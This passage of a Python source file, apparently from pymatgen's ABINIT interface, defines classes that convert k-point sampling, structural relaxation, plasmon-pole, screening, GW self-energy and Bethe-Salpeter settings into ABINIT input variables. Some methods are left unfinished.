and abs(lengths[right_angles[0]] -
lengths[right_angles[1]]) < hex_length_tol)
#style = Kpoints.modes.gamma
#if not is_hexagonal:
# num_div = [i + i % 2 for i in num_div]
# style = Kpoints.modes.monkhorst
comment = "abinitio generated KPOINTS with grid density = " + "{} / atom".format(kppa)
shifts = np.reshape(shifts, (-1, 3))
return cls(
mode="monkhorst", num_kpts=0, kpts=[num_div], kpt_shifts=shifts,
use_symmetries=use_symmetries, use_time_reversal=use_time_reversal, chksymbreak=chksymbreak,
comment=comment)
def to_abivars(self):
return self.abivars
def as_dict(self):
enc = MontyEncoder()
return {'mode': self.mode, 'comment': self.comment, 'num_kpts': self.num_kpts,
'kpts': enc.default(np.array(self.kpts)), 'kpt_shifts': self.kpt_shifts,
'kpts_weights': self.kpts_weights, 'use_symmetries': self.use_symmetries,
'use_time_reversal': self.use_time_reversal, 'chksymbreak': self.chksymbreak,
'@module': self.__class__.__module__, '@class': self.__class__.__name__}
@classmethod
def from_dict(cls, d):
d = d.copy()
d.pop('@module', None)
d.pop('@class', None)
dec = MontyDecoder()
d['kpts'] = dec.process_decoded(d['kpts'])
return cls(**d)
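# Illustrative: a 4x4x4 Monkhorst-Pack mesh with the default shift yields,
# per the constructor logic above:
#
#   KSampling.monkhorst([4, 4, 4]).to_abivars()
#   # -> {'ngkpt': array([4, 4, 4]), 'shiftk': array([[0.5, 0.5, 0.5]]),
#   #     'nshiftk': 1, 'kptopt': 1, 'chksymbreak': None}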
class Constraints(AbivarAble):
"""This object defines the constraints for structural relaxation"""
def to_abivars(self):
raise NotImplementedError("")
class RelaxationMethod(AbivarAble, PMGSONable):
"""
    This object stores the variables for the (constrained) structural optimization.
ionmov and optcell specify the type of relaxation.
The other variables are optional and their use depend on ionmov and optcell.
A None value indicates that we use abinit default. Default values can
be modified by passing them to the constructor.
The set of variables are constructed in to_abivars depending on ionmov and optcell.
"""
_default_vars = {
"ionmov" : MANDATORY,
"optcell" : MANDATORY,
"ntime" : 80,
"dilatmx" : 1.05,
"ecutsm" : 0.5,
"strfact" : None,
"tolmxf" : None,
"strtarget" : None,
"atoms_constraints": {}, # Constraints are stored in a dictionary. {} means if no constraint is enforced.
}
IONMOV_DEFAULT = 3
OPTCELL_DEFAULT = 2
def __init__(self, *args, **kwargs):
# Initialize abivars with the default values.
        # Copy so that the update below doesn't mutate the class-level defaults.
        self.abivars = self._default_vars.copy()
# Overwrite the keys with the args and kwargs passed to constructor.
self.abivars.update(*args, **kwargs)
self.abivars = AttrDict(self.abivars)
for k in self.abivars:
if k not in self._default_vars:
raise ValueError("%s: No default value has been provided for key %s" % (self.__class__.__name__, k))
for k in self.abivars:
            if self.abivars[k] is MANDATORY:
raise ValueError("%s: No default value has been provided for the mandatory key %s" %
(self.__class__.__name__, k))
@classmethod
def atoms_only(cls, atoms_constraints=None):
if atoms_constraints is None:
return cls(ionmov=cls.IONMOV_DEFAULT, optcell=0)
else:
return cls(ionmov=cls.IONMOV_DEFAULT, optcell=0, atoms_constraints=atoms_constraints)
@classmethod
def atoms_and_cell(cls, atoms_constraints=None):
if atoms_constraints is None:
return cls(ionmov=cls.IONMOV_DEFAULT, optcell=cls.OPTCELL_DEFAULT)
else:
            return cls(ionmov=cls.IONMOV_DEFAULT, optcell=cls.OPTCELL_DEFAULT, atoms_constraints=atoms_constraints)
@property
def move_atoms(self):
"""True if atoms must be moved."""
return self.abivars.ionmov != 0
@property
def move_cell(self):
"""True if lattice parameters must be optimized."""
return self.abivars.optcell != 0
def to_abivars(self):
"""Returns a dictionary with the abinit variables"""
# These variables are always present.
out_vars = {
"ionmov" : self.abivars.ionmov,
"optcell": self.abivars.optcell,
"ntime" : self.abivars.ntime,
}
# Atom relaxation.
if self.move_atoms:
out_vars.update({
"tolmxf": self.abivars.tolmxf,
})
if self.abivars.atoms_constraints:
# Add input variables for constrained relaxation.
raise NotImplementedError("")
out_vars.update(self.abivars.atoms_constraints.to_abivars())
# Cell relaxation.
if self.move_cell:
out_vars.update({
"dilatmx" : self.abivars.dilatmx,
"ecutsm" : self.abivars.ecutsm,
"strfact" : self.abivars.strfact,
"strtarget": self.abivars.strtarget,
})
return out_vars
def as_dict(self):
d = dict(self._default_vars)
d['@module'] = self.__class__.__module__
d['@class'] = self.__class__.__name__
return d
@classmethod
def from_dict(cls, d):
d = d.copy()
d.pop('@module', None)
d.pop('@class', None)
return cls(**d)
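# Illustrative: a combined atom + cell relaxation with the defaults above
# emits (None values mean "use the abinit default"):
#
#   RelaxationMethod.atoms_and_cell().to_abivars()
#   # -> {'ionmov': 3, 'optcell': 2, 'ntime': 80, 'tolmxf': None,
#   #     'dilatmx': 1.05, 'ecutsm': 0.5, 'strfact': None, 'strtarget': None}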
class PPModel(AbivarAble, PMGSONable):
"""
Parameters defining the plasmon-pole technique.
    The common way to instantiate a PPModel object is via the class method PPModel.as_ppmodel(string)
"""
_mode2ppmodel = {
"noppmodel": 0,
"godby" : 1,
"hybersten": 2,
"linden" : 3,
"farid" : 4,
}
modes = Enum(k for k in _mode2ppmodel)
@classmethod
def as_ppmodel(cls, obj):
"""
Constructs an instance of PPModel from obj.
Accepts obj in the form:
            * PPModel instance
            * string, e.g. "godby:12.3 eV", "linden".
"""
if isinstance(obj, cls):
return obj
# obj is a string
if ":" not in obj:
mode, plasmon_freq = obj, None
else:
# Extract mode and plasmon_freq
mode, plasmon_freq = obj.split(":")
try:
plasmon_freq = float(plasmon_freq)
except ValueError:
plasmon_freq, unit = plasmon_freq.split()
plasmon_freq = units.Energy(float(plasmon_freq), unit).to("Ha")
return cls(mode=mode, plasmon_freq=plasmon_freq)
def __init__(self, mode="godby", plasmon_freq=None):
assert mode in PPModel.modes
self.mode = mode
self.plasmon_freq = plasmon_freq
def __eq__(self, other):
if other is None:
return False
else:
if self.mode != other.mode:
return False
if self.plasmon_freq is None:
return other.plasmon_freq is None
else:
return np.allclose(self.plasmon_freq, other.plasmon_freq)
def __ne__(self, other):
return not self == other
def __bool__(self):
return self.mode != "noppmodel"
# py2 old version
__nonzero__ = __bool__
def __repr__(self):
return "<%s at %s, mode = %s>" % (self.__class__.__name__, id(self),
str(self.mode))
def to_abivars(self):
if self:
return {"ppmodel": self._mode2ppmodel[self.mode], "ppmfrq": self.plasmon_freq}
else:
return {}
@classmethod
def noppmodel(cls):
return cls(mode="noppmodel", plasmon_freq=None)
def as_dict(self):
return {"mode": self.mode, "plasmon_freq": self.plasmon_freq,
"@module": self.__class__.__module__,
"@class": self.__class__.__name__}
@staticmethod
def from_dict(d):
return PPModel(mode=d["mode"], plasmon_freq=d["plasmon_freq"])
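# Illustrative: parsing a plasmon-pole specification with an explicit unit
# (12.3 eV ~ 0.452 Ha, per the conversion in as_ppmodel above):
#
#   ppm = PPModel.as_ppmodel("godby:12.3 eV")
#   ppm.to_abivars()
#   # -> {'ppmodel': 1, 'ppmfrq': ~0.452}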
class HilbertTransform(AbivarAble):
"""
    Parameters for the Hilbert-transform method (screening code),
    i.e. the parameters defining the frequency mesh used for the spectral function
    and the frequency mesh used for the polarizability.
"""
def __init__(self, nomegasf, domegasf=None, spmeth=1, nfreqre=None, freqremax=None, nfreqim=None, freqremin=None):
"""
Args:
nomegasf: Number of points for sampling the spectral function along the real axis.
domegasf: Step in Ha for the linear mesh used for the spectral function.
            spmeth: Algorithm for the representation of the delta function.
nfreqre: Number of points along the real axis (linear mesh).
freqremax: Maximum frequency for W along the real axis (in hartree).
            nfreqim: Number of points along the imaginary axis (Gauss-Legendre mesh).
freqremin: Minimum frequency for W along the real axis (in hartree).
"""
# Spectral function
self.nomegasf = nomegasf
self.domegasf = domegasf
self.spmeth = spmeth
# Mesh for the contour-deformation method used for the integration of the self-energy
self.nfreqre = nfreqre
self.freqremax = freqremax
self.freqremin = freqremin
self.nfreqim = nfreqim
def to_abivars(self):
"""Returns a dictionary with the abinit variables"""
return {
# Spectral function
"nomegasf": self.nomegasf,
"domegasf": self.domegasf,
"spmeth" : self.spmeth,
# Frequency mesh for the polarizability
"nfreqre" : self.nfreqre,
"freqremax": self.freqremax,
"nfreqim" : self.nfreqim,
"freqremin": self.freqremin,
}
class ModelDielectricFunction(AbivarAble):
"""Model dielectric function used for BSE calculation"""
def __init__(self, mdf_epsinf):
self.mdf_epsinf = mdf_epsinf
def to_abivars(self):
return {"mdf_epsinf": self.mdf_epsinf}
##########################################################################################
################################# WORK IN PROGRESS ######################################
##########################################################################################
class Screening(AbivarAble):
"""
This object defines the parameters used for the
computation of the screening function.
"""
# Approximations used for W
_WTYPES = {
"RPA": 0,
}
    # Self-consistency modes
_SC_MODES = {
"one_shot" : 0,
"energy_only" : 1,
"wavefunctions": 2,
}
def __init__(self, ecuteps, nband, w_type="RPA", sc_mode="one_shot",
hilbert=None, ecutwfn=None, inclvkb=2):
"""
Args:
ecuteps: Cutoff energy for the screening (Ha units).
            nband: Number of bands for the Green's function.
w_type: Screening type
sc_mode: Self-consistency mode.
            hilbert: Instance of :class:`HilbertTransform` defining the parameters for the Hilbert transform method.
ecutwfn: Cutoff energy for the wavefunctions (Default: ecutwfn == ecut).
inclvkb: Option for the treatment of the dipole matrix elements (NC pseudos).
"""
if w_type not in self._WTYPES:
raise ValueError("W_TYPE: %s is not supported" % w_type)
if sc_mode not in self._SC_MODES:
            raise ValueError("Self-consistency mode %s is not supported" % sc_mode)
self.ecuteps = ecuteps
self.nband = nband
self.w_type = w_type
self.sc_mode = sc_mode
self.ecutwfn = ecutwfn
self.inclvkb = inclvkb
if hilbert is not None:
            raise NotImplementedError("Hilbert transform not coded yet")
self.hilbert = hilbert
# Default values
# TODO Change abinit defaults
        self.gwpara = 2
        self.awtr = 1
        self.symchi = 1
self.optdriver = 3
@property
def use_hilbert(self):
return hasattr(self, "hilbert")
#@property
#def gwcalctyp(self):
# "Return the value of the gwcalctyp input variable"
# dig0 = str(self._SIGMA_TYPES[self.type])
# dig1 = str(self._SC_MODES[self.sc_mode]
# return dig1.strip() + dig0.strip()
def to_abivars(self):
"""Returns a dictionary with the abinit variables"""
abivars = {
"ecuteps" : self.ecuteps,
"ecutwfn" : self.ecutwfn,
"inclvkb" : self.inclvkb,
"gwpara" : self.gwpara,
"awtr" : self.awtr,
"symchi" : self.symchi,
#"gwcalctyp": self.gwcalctyp,
#"fftgw" : self.fftgw,
"optdriver" : self.optdriver,
}
        # Variables for the Hilbert transform.
if self.use_hilbert:
abivars.update(self.hilbert.to_abivars())
return abivars
class SelfEnergy(AbivarAble):
"""
This object defines the parameters used for the computation of the self-energy.
"""
_SIGMA_TYPES = {
"gw" : 0,
"hartree_fock": 5,
"sex" : 6,
"cohsex" : 7,
"model_gw_ppm": 8,
"model_gw_cd" : 9,
}
_SC_MODES = {
"one_shot" : 0,
"energy_only" : 1,
"wavefunctions": 2,
}
def __init__(self, se_type, sc_mode, nband, ecutsigx, screening,
gw_qprange=1, ppmodel=None, ecuteps=None, ecutwfn=None, gwpara=2):
"""
Args:
se_type: Type of self-energy (str)
sc_mode: Self-consistency mode.
nband: Number of bands for the Green's function
ecutsigx: Cutoff energy for the exchange part of the self-energy (Ha units).
screening: :class:`Screening` instance.
gw_qprange: Option for the automatic selection of k-points and bands for GW corrections.
                See Abinit docs for more detail. The default value makes the code compute the
                QP energies for all the points in the IBZ and one band above and one band below the Fermi level.
ppmodel: :class:`PPModel` instance with the parameters used for the plasmon-pole technique.
ecuteps: Cutoff energy for the screening (Ha units).
ecutwfn: Cutoff energy for the wavefunctions (Default: ecutwfn == ecut).
"""
if se_type not in self._SIGMA_TYPES:
raise ValueError("SIGMA_TYPE: %s is not supported" % se_type)
if sc_mode not in self._SC_MODES:
            raise ValueError("Self-consistency mode %s is not supported" % sc_mode)
self.type = se_type
self.sc_mode = sc_mode
self.nband = nband
self.ecutsigx = ecutsigx
self.screening = screening
self.gw_qprange = gw_qprange
self.gwpara = gwpara
if ppmodel is not None:
assert not screening.use_hilbert
self.ppmodel = PPModel.as_ppmodel(ppmodel)
self.ecuteps = ecuteps if ecuteps is not None else screening.ecuteps
self.ecutwfn = ecutwfn
self.optdriver = 4
#band_mode in ["gap", "full"]
#if isinstance(kptgw, str) and kptgw == "all":
# self.kptgw = None
# self.nkptgw = None
#else:
# self.kptgw = np.reshape(kptgw, (-1,3))
# self.nkptgw = len(self.kptgw)
#if bdgw is None:
# raise ValueError("bdgw must be specified")
#if isinstance(bdgw, str):
# # TODO add new variable in Abinit so that we can specify
# # an energy interval around the KS gap.
# homo = float(nele) / 2.0
# #self.bdgw =
#else:
# self.bdgw = np.reshape(bdgw, (-1,2))
#self.freq_int = freq_int
@property
def use_ppmodel(self):
"""True if we are using the plasmon-pole approximation."""
return hasattr(self, "ppmodel")
@property
def gwcalctyp(self):
"""Returns the value of the gwcalctyp input variable."""
dig0 = str(self._SIGMA_TYPES[self.type])
dig1 = str(self._SC_MODES[self.sc_mode])
return dig1.strip() + dig0.strip()
@property
def symsigma(self):
"""1 if symmetries can be used to reduce the number of q-points."""
return 1 if self.sc_mode == "one_shot" else 0
def to_abivars(self):
"""Returns a dictionary with the abinit variables."""
abivars = dict(
gwcalctyp=self.gwcalctyp,
ecuteps=self.ecuteps,
ecutsigx=self.ecutsigx,
symsigma=self.symsigma,
gw_qprange=self.gw_qprange,
gwpara=self.gwpara,
optdriver=self.optdriver,
#"ecutwfn" : self.ecutwfn,
#"kptgw" : self.kptgw,
#"nkptgw" : self.nkptgw,
#"bdgw" : self.bdgw,
)
# FIXME: problem with the spin
#assert len(self.bdgw) == self.nkptgw
# ppmodel variables
if self.use_ppmodel:
abivars.update(self.ppmodel.to_abivars())
return abivars
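# Illustrative: for one-shot GW ("gw" + "one_shot") the two digit tables above
# combine into gwcalctyp "00" and symsigma is 1, so symmetries reduce the
# q-point sum (`scr` stands for a previously built Screening instance):
#
#   se = SelfEnergy("gw", "one_shot", nband=100, ecutsigx=8.0, screening=scr)
#   se.gwcalctyp   # -> '00'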
class ExcHamiltonian(AbivarAble):
"""This object contains the parameters for the solution of the Bethe-Salpeter equation."""
# Types of excitonic Hamiltonian.
_EXC_TYPES = {
"TDA": 0, # Tamm-Dancoff approximation.
"coupling": 1, # Calculation with coupling.
}
# Algorithms used to compute the macroscopic dielectric function
# and/or the exciton wavefunctions.
_ALGO2VAR = {
"direct_diago": 1,
"haydock" : 2,
"cg" : 3,
}
# Options specifying the treatment of the Coulomb term.
_COULOMB_MODES = [
"diago",
"full",
"model_df"
]
def __init__(self, bs_loband, nband, soenergy, coulomb_mode, ecuteps, spin_mode="polarized", mdf_epsinf=None,
exc_type="TDA", algo="haydock", with_lf=True, bs_freq_mesh=None, zcut=None, **kwargs):
"""
Args:
bs_loband: Lowest band index (Fortran convention) used in the e-h basis set.
Can be scalar or array of shape (nsppol,). Must be >= 1 and <= nband
nband: Max band index used in the e-h basis set.
soenergy: Scissors energy in Hartree.
coulomb_mode: Treatment of the Coulomb term.
ecuteps: Cutoff energy for W in Hartree.
            mdf_epsinf: Macroscopic dielectric function :math:`\epsilon_\infty` used in
the model dielectric function.
exc_type: Approximation used for the BSE Hamiltonian
with_lf: True if local field effects are included <==> exchange term is included
bs_freq_mesh: Frequency mesh for the macroscopic dielectric function (start, stop, step) in Ha.
zcut: Broadening parameter in Ha.
**kwargs:
Extra keywords
"""
spin_mode = SpinMode.as_spinmode(spin_mode)
# We want an array bs_loband(nsppol).
try:
bs_loband = np.reshape(bs_loband, spin_mode.nsppol)
except ValueError:
bs_loband = np.array(spin_mode.nsppol * [int(bs_loband)])
self.bs_loband = bs_loband
self.nband = nband
self.soenergy = soenergy
self.coulomb_mode = coulomb_mode
assert coulomb_mode in self._COULOMB_MODES
self.ecuteps = ecuteps
self.mdf_epsinf = mdf_epsinf
self.exc_type = exc_type
assert exc_type in self._EXC_TYPES
self.algo = algo
assert algo in self._ALGO2VAR
self.with_lf = with_lf
# if bs_freq_mesh is not given, abinit will select its own mesh.
self.bs_freq_mesh = np.array(bs_freq_mesh) if bs_freq_mesh is not None else bs_freq_mesh
self.zcut = zcut
self.optdriver = 99
# Extra options.
self.kwargs = kwargs
#if "chksymbreak" not in self.kwargs:
# self.kwargs["chksymbreak"] = 0
# Consistency check
        if any(bs_loband <= 0):
raise ValueError("bs_loband <= 0 while it is %s" % bs_loband)
if any(bs_loband >= nband):
raise ValueError("bs_loband (%s) >= nband (%s)" % (bs_loband, nband))
@property
def inclvkb(self):
"""Treatment of the dipole matrix element (NC pseudos, default is 2)"""
return self.kwargs.get("inclvkb", 2)
@property
def use_haydock(self):
"""True if we are using the Haydock iterative technique."""
return self.algo == "haydock"
@property
def use_cg(self):
"""True if we are using the conjugate gradient method."""
return self.algo == "cg"
@property
def use_direct_diago(self):
"""True if we are performing the direct diagonalization of the BSE Hamiltonian."""
return self.algo == "direct_diago"
def to_abivars(self):
"""Returns a dictionary with the abinit variables."""
abivars = dict(
bs_calctype=1,
bs_loband=self.bs_loband,
#nband=self.nband,
soenergy=self.soenergy,
ecuteps=self.ecuteps,
bs_algorithm = self._ALGO2VAR[self.algo],
bs_coulomb_term=21,
mdf_epsinf=self.mdf_epsinf,
bs_exchange_term=1 if self.with_lf else 0,
inclvkb=self.inclvkb,
zcut=self.zcut,
bs_freq_mesh=self.bs_freq_mesh,
bs_coupling=self._EXC_TYPES[self.exc_type],
optdriver=self.optdriver,
)
if self.use_haydock:
# FIXME
abivars.update(
bs_haydock_niter=100, # No. of iterations for Haydock
bs_hayd_term=0, # No terminator
bs_haydock_tol=[0.05, 0], # Stopping criteria
)
elif self.use_direct_diago:
raise NotImplementedError("")
elif self.use_cg:
raise NotImplementedError("")
else:
raise ValueError("Unknown algorithm for EXC: %s" % self.algo)
# Add extra kwargs
abivars.update(self.kwargs)
return abivars
|
mit
| -4,362,257,695,082,234,400
| 32.958003
| 118
| 0.570389
| false
| 3.623489
| false
| false
| false
|